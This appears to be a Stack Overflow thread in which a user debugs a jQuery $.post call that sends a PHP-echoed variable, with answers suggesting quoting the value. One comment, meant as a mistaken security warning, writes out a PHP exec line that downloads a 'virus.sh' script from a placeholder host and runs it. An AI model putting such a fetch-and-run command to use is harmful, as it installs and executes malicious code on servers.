# Using jQuery to POST to MySQL on Click

Tags: php, jquery, mysql

I'm trying to use jQuery to post a variable to a MySQL/PHP query.  I have a button, `class="button"` and the button code is:

```
$(".button").click(function(e){
  e.preventDefault();
  $.post("some.php", { var_today : <?php echo $new_var; ?> });
});
```

using:

```
if(isset($_POST['var_today'])){
echo $_POST['var_today'];
}
```

on my php page, and I get undefined index: var_today

the class button tag has an `onclick="window.open('')` attached to it, and once it's clicked, I get "undefined index" as the `var_today` is not being posted, what have I written wrong here?

Comment: add quotes around the value for `var_today`... IE `var_today : "<?php echo $new_var; ?>`

Comment: Also there is no need for an `onclick=""` attribute, as that's essentially what the jQuery.click() method is.

Comment: This isn't an answer, and maybe I'm misunderstanding your code, but note that you should never execute any code obtained as a result of a Javascript call. It would be trivial for an attacker to replace `<?php echo $new_var;?>` with `<?php exec("wget http://myvirus.com/virus.sh"); exec("./virus.sh"); ?>`

Comment: @JeffAllen: Yes, you are very much misunderstanding the code.  PHP is *server-side* and JavaScript is *client-side*.  The `<?php echo $new_var;?>` is executed by the server, it prints a string.  All the browser sees is the *output* of the `echo`.  A user visiting the site does not see the PHP code, only what it outputs.  There's no way for an attacker to replace the PHP code with something, unless they had access to your server.  If they did, you'd have bigger issues to worry about.

Comment: @JeffAllen when the button is clicked, I have a popup window that show the query results.  The button is used to send a word to the query(post) and return the values of the letter in the popup window

Comment: This page is being parsed with PHP, right?  If so, check the page's source (the actual JavaScript code that the browser is running), and make sure PHP is echoing out the variable.  The problem could be in your PHP code.  You can also add `console.log(<?php echo $new_var; ?>)` to this, and check the console when you click the button.

Comment: Right -- misunderstood the context. I was envisioning this being placed in a rendered HTML document, in which case the client would be sending the string "<?php ... ?>" to the server, presumably with the expectation that the server would execute that code (which would be silly).

Of course, if this is going into a PHP script, then it will be executed before getting rendered in HTML. In that case, after having completely discredited myself, I recommend @Robert's answer.

Comment: Where are you getting an "undefined index"?  In PHP, or in JavaScript?

Comment: @Rocket, edited above and in php/mysql query

Comment: @ChadW: `echo $var_today;`?  Don't you mean `echo $_POST['var_today'];`?

Answer (score 0, accepted):

```
{ var_today : "<?php echo $new_var; ?>" }
```

This should work.

Answer (score 3):

You need to quote your value:

```
$.post("some.php", { var_today : "<?php echo $new_var; ?>" },
```

Comment: I thank you for the quick response, but that does not change the undefined index, as the value is not being posted, i have another page using the setInterval function using a php variable and it works fine.  I've also tried an alert once I click the button, nothing..

Comment: Show us your some.php PHP, or are you using firebug to verify your post?  Also, have you defined a javascript function called returned?

Comment: the query is just a select all from tbl where regexp^var_today.  I do not have a returned as I don't need anything back, just the popup to perform the query and display

Comment: I do not use the returned and have removed it to just a post statement

Comment: I have added a success function called feedback, it's only job is to make an alert window stating sent, that works now as I moved the code up above the title tag just below head, still no posted data though

Answer (score 0):

Try this:

```
$(".button").click(function(e){
  e.preventDefault();
  $.post("some.php", { var_today: ""});
});
```

Comment: How would that help?  He wants to post the value, not a blank string.

Comment: Look at the edit log, when I started writing the answer, `<?php echo $new_var; ?>` was not added by Jon yet, so I assume his example was to pass anything as long as the function works

Comment: Ah, yes, the original question did not show the PHP tags. :-P

Comment: @Rocket odd, it shows in mine, regardless I had tried that option first except included the php echo, undefined index

Comment: @ChadW: When posting code, you need to highlight it and click the `{}` button in the toolbar to format it correctly (there's a live preview under the textbox to show you *exactly* what the post looks like).  Also, where are you getting an "undefined index"  In PHP or in JavaScript?

Comment: @Churk tried that, and tried to echo from a blank php page, variable is not even being sent?